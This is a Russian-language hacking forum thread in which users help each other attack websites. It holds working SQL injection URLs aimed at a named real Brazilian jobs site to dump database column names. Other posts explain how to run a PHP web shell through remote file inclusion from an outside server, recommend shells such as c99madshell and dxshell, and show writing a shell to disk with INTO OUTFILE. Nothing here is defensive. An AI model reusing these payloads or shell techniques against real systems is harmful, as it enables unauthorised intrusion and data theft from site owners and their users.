28.02.2010, 08:47
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от LokbatanLi
я ету знаю..мне нуэн вот здес написат полное имя..
http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+
в конце написат полное имя таблици..и в какоы кодировке как написать ??
Код:
http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4%20,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x7573657273+--+
Открываешь исходный код, ищешь к примеру password и там все колонки, а вообще просто дописываешь and+column_name>hex твоей последней полученной колонки. Не глупи, и сам экспериментируй
|
|
|
28.02.2010, 13:43
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863
Репутация:
80
|
|
Ребята, я вроде как не полный новичок, просто никогда не работал с шелами. Но надо же когда-то начинать 
Вопрос больше по теоретической части, по поводу запуска шела через php-include.
Вот есть у меня на сайте шел http://mysite.com/shell.php, и есть инклуд (глобальный) http://site.com/index.php?dir=asdsad.
Делаем так: http://site.com/index.php?dir=http://mysite.com./shell.php%00 (только не надо говорить, что такие ситуации сейчас встречаются редко и т.д. просто представим такую ситуацию, что все работает).
Ну и собственно у меня появляется на мониторе мой шел. А теперь объясните мне, какой от него толк?! Ведь шел залит-то на моём сайте, и отображает директории все и информацию именно о моём сайте  Просто отобразился мой шел с моего сайта на сайте site.com как бы в отдельном фрейме.
Может быть у меня какое-то размытое понятие о шелах, об их разновидностях и использовании. Сам юзаю c99madshell.
Увы, детальную инфу о шелах на форуме не нашел. Если я где-то что-то провтыкал, прошу указать, где можно об этом почитать. Заранее благодарен
Последний раз редактировалось Sams; 28.02.2010 в 13:48..
|
|
|
|
28.02.2010, 13:45
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Если там всеже ремоут инклюд,а не фрейм, тогда переименуй свой шелл в
http://mysite.com/shell.txt
и пробуй так
|
|
|
|
28.02.2010, 13:52
|
|
Новичок
Регистрация: 18.02.2010
Сообщений: 20
Провел на форуме:
63443
Репутация:
33
|
|
Проблема в том что у тя сайт поддерживает пхп а надо шелл держать либо на хосте без пхп, или изменить расширение....
|
|
|
|
28.02.2010, 14:01
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863
Репутация:
80
|
|
Да, точно, http://mysite.com/shell.txt заработало
Хм, теперь стало чуть понятней принцип. Спасибо.
А может кто-то дать ссылку на хорошую инфу по шелам? И каким лучше всего шелом пользоваться? |
|
|
|
28.02.2010, 14:03
|
|
Новичок
Регистрация: 18.02.2010
Сообщений: 20
Провел на форуме:
63443
Репутация:
33
|
|
редкий шелл - но крутой dxshell.
лит-ры в основном нету, шелл это файловый менеджер.+ выполнение смд
Постучись ко мне - скажи что не понимаешь объясню
|
|
|
|
28.02.2010, 15:00
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Sams, либо просто запихай шелл в папку с .htaccess в котором укажи что бы .php исполнялось как text.
|
|
|
|
28.02.2010, 18:49
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2FAQ666
что-то мне подсказывает, что проблема возникла из-за слешей, попробуй
INTO OUTFILE 'D:/htdocs/www.site.ru/shel.php'
Последний раз редактировалось Iceangel_; 28.02.2010 в 19:14..
|
|
|
|
28.02.2010, 19:45
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
Сообщение от Iceangel_
2FAQ666
что-то мне подсказывает, что проблема возникла из-за слешей, попробуй
Ой спасибочки)))))) так и есть!
|
|
|
|
28.02.2010, 21:03
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
А можно ли в инъекции определить тип поля и длину(если Text)?
Пока ходил курить, нашёл ответ, если кого заинтересовало и кто не знает:
GROUP_CONCAT(column_name,0x3a,column_type) from information_schema.columns where table_name='tablename'
Последний раз редактировалось Seravin; 28.02.2010 в 21:47..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
